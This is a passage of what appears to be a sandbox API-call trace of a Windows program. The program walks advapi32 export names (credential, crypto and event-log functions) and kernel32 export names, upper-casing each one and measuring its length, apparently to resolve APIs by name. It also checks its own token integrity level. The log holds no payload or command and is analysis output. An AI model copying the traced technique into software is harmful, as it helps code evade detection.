(lpString="CREDREADDOMAINCREDENTIALSW") returned 26 [0158.345] lstrcpyA (in: lpString1=0x239e340, lpString2="CredReadW" | out: lpString1="CredReadW") returned="CredReadW" [0158.345] lstrlenA (lpString="CREDREADW") returned 9 [0158.345] lstrcpyA (in: lpString1=0x239e340, lpString2="CredRenameA" | out: lpString1="CredRenameA") returned="CredRenameA" [0158.345] lstrlenA (lpString="CREDRENAMEA") returned 11 [0158.345] lstrcpyA (in: lpString1=0x239e340, lpString2="CredRenameW" | out: lpString1="CredRenameW") returned="CredRenameW" [0158.345] lstrlenA (lpString="CREDRENAMEW") returned 11 [0158.345] lstrcpyA (in: lpString1=0x239e340, lpString2="CredRestoreCredentials" | out: lpString1="CredRestoreCredentials") returned="CredRestoreCredentials" [0158.345] lstrlenA (lpString="CREDRESTORECREDENTIALS") returned 22 [0158.345] lstrcpyA (in: lpString1=0x239e340, lpString2="CredUnmarshalCredentialA" | out: lpString1="CredUnmarshalCredentialA") returned="CredUnmarshalCredentialA" [0158.345] lstrlenA (lpString="CREDUNMARSHALCREDENTIALA") returned 24 [0158.345] lstrcpyA (in: lpString1=0x239e340, lpString2="CredUnmarshalCredentialW" | out: lpString1="CredUnmarshalCredentialW") returned="CredUnmarshalCredentialW" [0158.345] lstrlenA (lpString="CREDUNMARSHALCREDENTIALW") returned 24 [0158.345] lstrcpyA (in: lpString1=0x239e340, lpString2="CredUnprotectA" | out: lpString1="CredUnprotectA") returned="CredUnprotectA" [0158.345] lstrlenA (lpString="CREDUNPROTECTA") returned 14 [0158.345] lstrcpyA (in: lpString1=0x239e340, lpString2="CredUnprotectW" | out: lpString1="CredUnprotectW") returned="CredUnprotectW" [0158.345] lstrlenA (lpString="CREDUNPROTECTW") returned 14 [0158.345] lstrcpyA (in: lpString1=0x239e340, lpString2="CredWriteA" | out: lpString1="CredWriteA") returned="CredWriteA" [0158.345] lstrlenA (lpString="CREDWRITEA") returned 10 [0158.345] lstrcpyA (in: lpString1=0x239e340, lpString2="CredWriteDomainCredentialsA" | out: lpString1="CredWriteDomainCredentialsA") returned="CredWriteDomainCredentialsA" [0158.345] lstrlenA (lpString="CREDWRITEDOMAINCREDENTIALSA") returned 27 [0158.345] lstrcpyA (in: lpString1=0x239e340, lpString2="CredWriteDomainCredentialsW" | out: lpString1="CredWriteDomainCredentialsW") returned="CredWriteDomainCredentialsW" [0158.345] lstrlenA (lpString="CREDWRITEDOMAINCREDENTIALSW") returned 27 [0158.345] lstrcpyA (in: lpString1=0x239e340, lpString2="CredWriteW" | out: lpString1="CredWriteW") returned="CredWriteW" [0158.345] lstrlenA (lpString="CREDWRITEW") returned 10 [0158.345] lstrcpyA (in: lpString1=0x239e340, lpString2="CredpConvertCredential" | out: lpString1="CredpConvertCredential") returned="CredpConvertCredential" [0158.345] lstrlenA (lpString="CREDPCONVERTCREDENTIAL") returned 22 [0158.345] lstrcpyA (in: lpString1=0x239e340, lpString2="CredpConvertOneCredentialSize" | out: lpString1="CredpConvertOneCredentialSize") returned="CredpConvertOneCredentialSize" [0158.345] lstrlenA (lpString="CREDPCONVERTONECREDENTIALSIZE") returned 29 [0158.345] lstrcpyA (in: lpString1=0x239e340, lpString2="CredpConvertTargetInfo" | out: lpString1="CredpConvertTargetInfo") returned="CredpConvertTargetInfo" [0158.345] lstrlenA (lpString="CREDPCONVERTTARGETINFO") returned 22 [0158.345] lstrcpyA (in: lpString1=0x239e340, lpString2="CredpDecodeCredential" | out: lpString1="CredpDecodeCredential") returned="CredpDecodeCredential" [0158.345] lstrlenA (lpString="CREDPDECODECREDENTIAL") returned 21 [0158.345] lstrcpyA (in: lpString1=0x239e340, lpString2="CredpEncodeCredential" | out: lpString1="CredpEncodeCredential") returned="CredpEncodeCredential" [0158.346] lstrlenA (lpString="CREDPENCODECREDENTIAL") returned 21 [0158.346] lstrcpyA (in: lpString1=0x239e340, lpString2="CredpEncodeSecret" | out: lpString1="CredpEncodeSecret") returned="CredpEncodeSecret" [0158.346] lstrlenA (lpString="CREDPENCODESECRET") returned 17 [0158.346] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptAcquireContextA" | out: lpString1="CryptAcquireContextA") returned="CryptAcquireContextA" [0158.346] lstrlenA (lpString="CRYPTACQUIRECONTEXTA") returned 20 [0158.346] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptAcquireContextW" | out: lpString1="CryptAcquireContextW") returned="CryptAcquireContextW" [0158.346] lstrlenA (lpString="CRYPTACQUIRECONTEXTW") returned 20 [0158.346] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptContextAddRef" | out: lpString1="CryptContextAddRef") returned="CryptContextAddRef" [0158.346] lstrlenA (lpString="CRYPTCONTEXTADDREF") returned 18 [0158.346] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptCreateHash" | out: lpString1="CryptCreateHash") returned="CryptCreateHash" [0158.346] lstrlenA (lpString="CRYPTCREATEHASH") returned 15 [0158.346] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptDecrypt" | out: lpString1="CryptDecrypt") returned="CryptDecrypt" [0158.346] lstrlenA (lpString="CRYPTDECRYPT") returned 12 [0158.346] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptDeriveKey" | out: lpString1="CryptDeriveKey") returned="CryptDeriveKey" [0158.346] lstrlenA (lpString="CRYPTDERIVEKEY") returned 14 [0158.346] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptDestroyHash" | out: lpString1="CryptDestroyHash") returned="CryptDestroyHash" [0158.346] lstrlenA (lpString="CRYPTDESTROYHASH") returned 16 [0158.346] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptDestroyKey" | out: lpString1="CryptDestroyKey") returned="CryptDestroyKey" [0158.346] lstrlenA (lpString="CRYPTDESTROYKEY") returned 15 [0158.346] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptDuplicateHash" | out: lpString1="CryptDuplicateHash") returned="CryptDuplicateHash" [0158.346] lstrlenA (lpString="CRYPTDUPLICATEHASH") returned 18 [0158.346] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptDuplicateKey" | out: lpString1="CryptDuplicateKey") returned="CryptDuplicateKey" [0158.346] lstrlenA (lpString="CRYPTDUPLICATEKEY") returned 17 [0158.346] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptEncrypt" | out: lpString1="CryptEncrypt") returned="CryptEncrypt" [0158.346] lstrlenA (lpString="CRYPTENCRYPT") returned 12 [0158.346] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptEnumProviderTypesA" | out: lpString1="CryptEnumProviderTypesA") returned="CryptEnumProviderTypesA" [0158.346] lstrlenA (lpString="CRYPTENUMPROVIDERTYPESA") returned 23 [0158.346] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptEnumProviderTypesW" | out: lpString1="CryptEnumProviderTypesW") returned="CryptEnumProviderTypesW" [0158.346] lstrlenA (lpString="CRYPTENUMPROVIDERTYPESW") returned 23 [0158.346] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptEnumProvidersA" | out: lpString1="CryptEnumProvidersA") returned="CryptEnumProvidersA" [0158.346] lstrlenA (lpString="CRYPTENUMPROVIDERSA") returned 19 [0158.346] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptEnumProvidersW" | out: lpString1="CryptEnumProvidersW") returned="CryptEnumProvidersW" [0158.346] lstrlenA (lpString="CRYPTENUMPROVIDERSW") returned 19 [0158.346] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptExportKey" | out: lpString1="CryptExportKey") returned="CryptExportKey" [0158.346] lstrlenA (lpString="CRYPTEXPORTKEY") returned 14 [0158.346] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptGenKey" | out: lpString1="CryptGenKey") returned="CryptGenKey" [0158.347] lstrlenA (lpString="CRYPTGENKEY") returned 11 [0158.347] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptGenRandom" | out: lpString1="CryptGenRandom") returned="CryptGenRandom" [0158.347] lstrlenA (lpString="CRYPTGENRANDOM") returned 14 [0158.347] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptGetDefaultProviderA" | out: lpString1="CryptGetDefaultProviderA") returned="CryptGetDefaultProviderA" [0158.347] lstrlenA (lpString="CRYPTGETDEFAULTPROVIDERA") returned 24 [0158.347] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptGetDefaultProviderW" | out: lpString1="CryptGetDefaultProviderW") returned="CryptGetDefaultProviderW" [0158.347] lstrlenA (lpString="CRYPTGETDEFAULTPROVIDERW") returned 24 [0158.347] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptGetHashParam" | out: lpString1="CryptGetHashParam") returned="CryptGetHashParam" [0158.347] lstrlenA (lpString="CRYPTGETHASHPARAM") returned 17 [0158.347] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptGetKeyParam" | out: lpString1="CryptGetKeyParam") returned="CryptGetKeyParam" [0158.347] lstrlenA (lpString="CRYPTGETKEYPARAM") returned 16 [0158.347] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptGetProvParam" | out: lpString1="CryptGetProvParam") returned="CryptGetProvParam" [0158.347] lstrlenA (lpString="CRYPTGETPROVPARAM") returned 17 [0158.347] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptGetUserKey" | out: lpString1="CryptGetUserKey") returned="CryptGetUserKey" [0158.347] lstrlenA (lpString="CRYPTGETUSERKEY") returned 15 [0158.347] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptHashData" | out: lpString1="CryptHashData") returned="CryptHashData" [0158.347] lstrlenA (lpString="CRYPTHASHDATA") returned 13 [0158.347] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptHashSessionKey" | out: lpString1="CryptHashSessionKey") returned="CryptHashSessionKey" [0158.347] lstrlenA (lpString="CRYPTHASHSESSIONKEY") returned 19 [0158.347] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptImportKey" | out: lpString1="CryptImportKey") returned="CryptImportKey" [0158.347] lstrlenA (lpString="CRYPTIMPORTKEY") returned 14 [0158.347] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptReleaseContext" | out: lpString1="CryptReleaseContext") returned="CryptReleaseContext" [0158.347] lstrlenA (lpString="CRYPTRELEASECONTEXT") returned 19 [0158.347] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptSetHashParam" | out: lpString1="CryptSetHashParam") returned="CryptSetHashParam" [0158.347] lstrlenA (lpString="CRYPTSETHASHPARAM") returned 17 [0158.347] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptSetKeyParam" | out: lpString1="CryptSetKeyParam") returned="CryptSetKeyParam" [0158.347] lstrlenA (lpString="CRYPTSETKEYPARAM") returned 16 [0158.347] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptSetProvParam" | out: lpString1="CryptSetProvParam") returned="CryptSetProvParam" [0158.348] lstrlenA (lpString="CRYPTSETPROVPARAM") returned 17 [0158.348] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptSetProviderA" | out: lpString1="CryptSetProviderA") returned="CryptSetProviderA" [0158.348] lstrlenA (lpString="CRYPTSETPROVIDERA") returned 17 [0158.348] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptSetProviderExA" | out: lpString1="CryptSetProviderExA") returned="CryptSetProviderExA" [0158.348] lstrlenA (lpString="CRYPTSETPROVIDEREXA") returned 19 [0158.348] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptSetProviderExW" | out: lpString1="CryptSetProviderExW") returned="CryptSetProviderExW" [0158.348] lstrlenA (lpString="CRYPTSETPROVIDEREXW") returned 19 [0158.348] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptSetProviderW" | out: lpString1="CryptSetProviderW") returned="CryptSetProviderW" [0158.348] lstrlenA (lpString="CRYPTSETPROVIDERW") returned 17 [0158.348] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptSignHashA" | out: lpString1="CryptSignHashA") returned="CryptSignHashA" [0158.348] lstrlenA (lpString="CRYPTSIGNHASHA") returned 14 [0158.348] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptSignHashW" | out: lpString1="CryptSignHashW") returned="CryptSignHashW" [0158.348] lstrlenA (lpString="CRYPTSIGNHASHW") returned 14 [0158.348] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptVerifySignatureA" | out: lpString1="CryptVerifySignatureA") returned="CryptVerifySignatureA" [0158.348] lstrlenA (lpString="CRYPTVERIFYSIGNATUREA") returned 21 [0158.348] lstrcpyA (in: lpString1=0x239e340, lpString2="CryptVerifySignatureW" | out: lpString1="CryptVerifySignatureW") returned="CryptVerifySignatureW" [0158.348] lstrlenA (lpString="CRYPTVERIFYSIGNATUREW") returned 21 [0158.348] lstrcpyA (in: lpString1=0x239e340, lpString2="DecryptFileA" | out: lpString1="DecryptFileA") returned="DecryptFileA" [0158.348] lstrlenA (lpString="DECRYPTFILEA") returned 12 [0158.348] lstrcpyA (in: lpString1=0x239e340, lpString2="DecryptFileW" | out: lpString1="DecryptFileW") returned="DecryptFileW" [0158.348] lstrlenA (lpString="DECRYPTFILEW") returned 12 [0158.348] lstrcpyA (in: lpString1=0x239e340, lpString2="DeleteAce" | out: lpString1="DeleteAce") returned="DeleteAce" [0158.348] lstrlenA (lpString="DELETEACE") returned 9 [0158.348] lstrcpyA (in: lpString1=0x239e340, lpString2="DeleteService" | out: lpString1="DeleteService") returned="DeleteService" [0158.348] lstrlenA (lpString="DELETESERVICE") returned 13 [0158.349] lstrcpyA (in: lpString1=0x239e340, lpString2="DeregisterEventSource" | out: lpString1="DeregisterEventSource") returned="DeregisterEventSource" [0158.349] lstrlenA (lpString="DEREGISTEREVENTSOURCE") returned 21 [0158.349] lstrcpyA (in: lpString1=0x239e340, lpString2="DestroyPrivateObjectSecurity" | out: lpString1="DestroyPrivateObjectSecurity") returned="DestroyPrivateObjectSecurity" [0158.349] lstrlenA (lpString="DESTROYPRIVATEOBJECTSECURITY") returned 28 [0158.349] lstrcpyA (in: lpString1=0x239e340, lpString2="DuplicateEncryptionInfoFile" | out: lpString1="DuplicateEncryptionInfoFile") returned="DuplicateEncryptionInfoFile" [0158.349] lstrlenA (lpString="DUPLICATEENCRYPTIONINFOFILE") returned 27 [0158.349] lstrcpyA (in: lpString1=0x239e340, lpString2="DuplicateToken" | out: lpString1="DuplicateToken") returned="DuplicateToken" [0158.349] lstrlenA (lpString="DUPLICATETOKEN") returned 14 [0158.349] lstrcpyA (in: lpString1=0x239e340, lpString2="DuplicateTokenEx" | out: lpString1="DuplicateTokenEx") returned="DuplicateTokenEx" [0158.349] lstrlenA (lpString="DUPLICATETOKENEX") returned 16 [0158.349] lstrcpyA (in: lpString1=0x239e340, lpString2="ElfBackupEventLogFileA" | out: lpString1="ElfBackupEventLogFileA") returned="ElfBackupEventLogFileA" [0158.349] lstrlenA (lpString="ELFBACKUPEVENTLOGFILEA") returned 22 [0158.349] lstrcpyA (in: lpString1=0x239e340, lpString2="ElfBackupEventLogFileW" | out: lpString1="ElfBackupEventLogFileW") returned="ElfBackupEventLogFileW" [0158.349] lstrlenA (lpString="ELFBACKUPEVENTLOGFILEW") returned 22 [0158.349] lstrcpyA (in: lpString1=0x239e340, lpString2="ElfChangeNotify" | out: lpString1="ElfChangeNotify") returned="ElfChangeNotify" [0158.349] lstrlenA (lpString="ELFCHANGENOTIFY") returned 15 [0158.349] lstrcpyA (in: lpString1=0x239e340, lpString2="ElfClearEventLogFileA" | out: lpString1="ElfClearEventLogFileA") returned="ElfClearEventLogFileA" [0158.349] lstrlenA (lpString="ELFCLEAREVENTLOGFILEA") returned 21 [0158.349] lstrcpyA (in: lpString1=0x239e340, lpString2="ElfClearEventLogFileW" | out: lpString1="ElfClearEventLogFileW") returned="ElfClearEventLogFileW" [0158.349] lstrlenA (lpString="ELFCLEAREVENTLOGFILEW") returned 21 [0158.349] lstrcpyA (in: lpString1=0x239e340, lpString2="ElfCloseEventLog" | out: lpString1="ElfCloseEventLog") returned="ElfCloseEventLog" [0158.349] lstrlenA (lpString="ELFCLOSEEVENTLOG") returned 16 [0158.349] lstrcpyA (in: lpString1=0x239e340, lpString2="ElfDeregisterEventSource" | out: lpString1="ElfDeregisterEventSource") returned="ElfDeregisterEventSource" [0158.349] lstrlenA (lpString="ELFDEREGISTEREVENTSOURCE") returned 24 [0158.349] lstrcpyA (in: lpString1=0x239e340, lpString2="ElfFlushEventLog" | out: lpString1="ElfFlushEventLog") returned="ElfFlushEventLog" [0158.349] lstrlenA (lpString="ELFFLUSHEVENTLOG") returned 16 [0158.349] lstrcpyA (in: lpString1=0x239e340, lpString2="ElfNumberOfRecords" | out: lpString1="ElfNumberOfRecords") returned="ElfNumberOfRecords" [0158.349] lstrlenA (lpString="ELFNUMBEROFRECORDS") returned 18 [0158.349] lstrcpyA (in: lpString1=0x239e340, lpString2="ElfOldestRecord" | out: lpString1="ElfOldestRecord") returned="ElfOldestRecord" [0158.349] lstrlenA (lpString="ELFOLDESTRECORD") returned 15 [0158.349] lstrcpyA (in: lpString1=0x239e340, lpString2="ElfOpenBackupEventLogA" | out: lpString1="ElfOpenBackupEventLogA") returned="ElfOpenBackupEventLogA" [0158.349] lstrlenA (lpString="ELFOPENBACKUPEVENTLOGA") returned 22 [0158.349] lstrcpyA (in: lpString1=0x239e340, lpString2="ElfOpenBackupEventLogW" | out: lpString1="ElfOpenBackupEventLogW") returned="ElfOpenBackupEventLogW" [0158.350] lstrlenA (lpString="ELFOPENBACKUPEVENTLOGW") returned 22 [0158.350] lstrcpyA (in: lpString1=0x239e340, lpString2="ElfOpenEventLogA" | out: lpString1="ElfOpenEventLogA") returned="ElfOpenEventLogA" [0158.350] lstrlenA (lpString="ELFOPENEVENTLOGA") returned 16 [0158.350] lstrcpyA (in: lpString1=0x239e340, lpString2="ElfOpenEventLogW" | out: lpString1="ElfOpenEventLogW") returned="ElfOpenEventLogW" [0158.350] lstrlenA (lpString="ELFOPENEVENTLOGW") returned 16 [0158.350] lstrcpyA (in: lpString1=0x239e340, lpString2="ElfReadEventLogA" | out: lpString1="ElfReadEventLogA") returned="ElfReadEventLogA" [0158.350] lstrlenA (lpString="ELFREADEVENTLOGA") returned 16 [0158.350] lstrcpyA (in: lpString1=0x239e340, lpString2="ElfReadEventLogW" | out: lpString1="ElfReadEventLogW") returned="ElfReadEventLogW" [0158.350] lstrlenA (lpString="ELFREADEVENTLOGW") returned 16 [0158.350] lstrcpyA (in: lpString1=0x239e340, lpString2="ElfRegisterEventSourceA" | out: lpString1="ElfRegisterEventSourceA") returned="ElfRegisterEventSourceA" [0158.350] lstrlenA (lpString="ELFREGISTEREVENTSOURCEA") returned 23 [0158.350] lstrcpyA (in: lpString1=0x239e340, lpString2="ElfRegisterEventSourceW" | out: lpString1="ElfRegisterEventSourceW") returned="ElfRegisterEventSourceW" [0158.350] lstrlenA (lpString="ELFREGISTEREVENTSOURCEW") returned 23 [0158.350] lstrcpyA (in: lpString1=0x239e340, lpString2="ElfReportEventA" | out: lpString1="ElfReportEventA") returned="ElfReportEventA" [0158.350] lstrlenA (lpString="ELFREPORTEVENTA") returned 15 [0158.350] lstrcpyA (in: lpString1=0x239e340, lpString2="ElfReportEventAndSourceW" | out: lpString1="ElfReportEventAndSourceW") returned="ElfReportEventAndSourceW" [0158.350] lstrlenA (lpString="ELFREPORTEVENTANDSOURCEW") returned 24 [0158.350] lstrcpyA (in: lpString1=0x239e340, lpString2="ElfReportEventW" | out: lpString1="ElfReportEventW") returned="ElfReportEventW" [0158.350] lstrlenA (lpString="ELFREPORTEVENTW") returned 15 [0158.350] lstrcpyA (in: lpString1=0x239e340, lpString2="EnableTrace" | out: lpString1="EnableTrace") returned="EnableTrace" [0158.350] lstrlenA (lpString="ENABLETRACE") returned 11 [0158.350] lstrcpyA (in: lpString1=0x239e340, lpString2="EnableTraceEx" | out: lpString1="EnableTraceEx") returned="EnableTraceEx" [0158.350] lstrlenA (lpString="ENABLETRACEEX") returned 13 [0158.350] lstrcpyA (in: lpString1=0x239e340, lpString2="EnableTraceEx2" | out: lpString1="EnableTraceEx2") returned="EnableTraceEx2" [0158.350] lstrlenA (lpString="ENABLETRACEEX2") returned 14 [0158.350] lstrcpyA (in: lpString1=0x239e340, lpString2="EncryptFileA" | out: lpString1="EncryptFileA") returned="EncryptFileA" [0158.350] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x239efcc | out: TokenHandle=0x239efcc*=0xe0) returned 1 [0158.351] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x239efd0 | out: TokenInformation=0x0, ReturnLength=0x239efd0) returned 0 [0158.351] GetLastError () returned 0x7a [0158.351] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x461da8 [0158.351] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x19, TokenInformation=0x461da8, TokenInformationLength=0x14, ReturnLength=0x239efd0 | out: TokenInformation=0x461da8, ReturnLength=0x239efd0) returned 1 [0158.351] GetSidSubAuthorityCount (pSid=0x461db0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x461db1 [0158.351] GetSidSubAuthority (pSid=0x461db0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x461db8 [0158.351] LocalFree (hMem=0x461da8) returned 0x0 [0158.351] lstrlenA (lpString="kernel32.dll") returned 12 [0158.351] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0158.351] lstrcpyA (in: lpString1=0x239e348, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0158.351] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0158.351] lstrcpyA (in: lpString1=0x239e348, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0158.351] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0158.351] lstrcpyA (in: lpString1=0x239e348, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0158.351] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0158.351] lstrcpyA (in: lpString1=0x239e348, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0158.351] lstrlenA (lpString="ADDATOMA") returned 8 [0158.351] lstrcpyA (in: lpString1=0x239e348, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0158.351] lstrlenA (lpString="ADDATOMW") returned 8 [0158.351] lstrcpyA (in: lpString1=0x239e348, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0158.351] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0158.351] lstrcpyA (in: lpString1=0x239e348, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0158.351] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0158.351] lstrcpyA (in: lpString1=0x239e348, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0158.352] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0158.352] lstrcpyA (in: lpString1=0x239e348, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0158.352] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0158.352] lstrcpyA (in: lpString1=0x239e348, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0158.352] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0158.352] lstrcpyA (in: lpString1=0x239e348, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0158.352] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0158.352] lstrcpyA (in: lpString1=0x239e348, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0158.352] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0158.352] lstrcpyA (in: lpString1=0x239e348, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0158.352] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0158.352] lstrcpyA (in: lpString1=0x239e348, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0158.352] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0158.352] lstrcpyA (in: lpString1=0x239e348, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0158.352] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0158.352] lstrcpyA (in: lpString1=0x239e348, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0158.352] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0158.352] lstrcpyA (in: lpString1=0x239e348, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0158.352] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0158.352] lstrcpyA (in: lpString1=0x239e348, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0158.352] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0158.352] lstrcpyA (in: lpString1=0x239e348, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0158.352] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0158.352] lstrcpyA (in: lpString1=0x239e348, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0158.352] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0158.352] lstrcpyA (in: lpString1=0x239e348, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0158.352] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0158.352] lstrcpyA (in: lpString1=0x239e348, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0158.352] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0158.352] lstrcpyA (in: lpString1=0x239e348, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0158.352] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0158.352] lstrcpyA (in: lpString1=0x239e348, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0158.352] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0158.352] lstrcpyA (in: lpString1=0x239e348, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0158.352] lstrlenA (lpString="BACKUPREAD") returned 10 [0158.352] lstrcpyA (in: lpString1=0x239e348, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0158.352] lstrlenA (lpString="BACKUPSEEK") returned 10 [0158.352] lstrcpyA (in: lpString1=0x239e348, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0158.353] lstrlenA (lpString="BACKUPWRITE") returned 11 [0158.353] lstrcpyA (in: lpString1=0x239e348, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0158.353] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0158.353] lstrcpyA (in: lpString1=0x239e348, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0158.353] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0158.353] lstrcpyA (in: lpString1=0x239e348, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0158.353] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0158.353] lstrcpyA (in: lpString1=0x239e348, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0158.353] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0158.353] lstrcpyA (in: lpString1=0x239e348, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0158.353] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0158.353] lstrcpyA (in: lpString1=0x239e348, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0158.353] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0158.353] lstrcpyA (in: 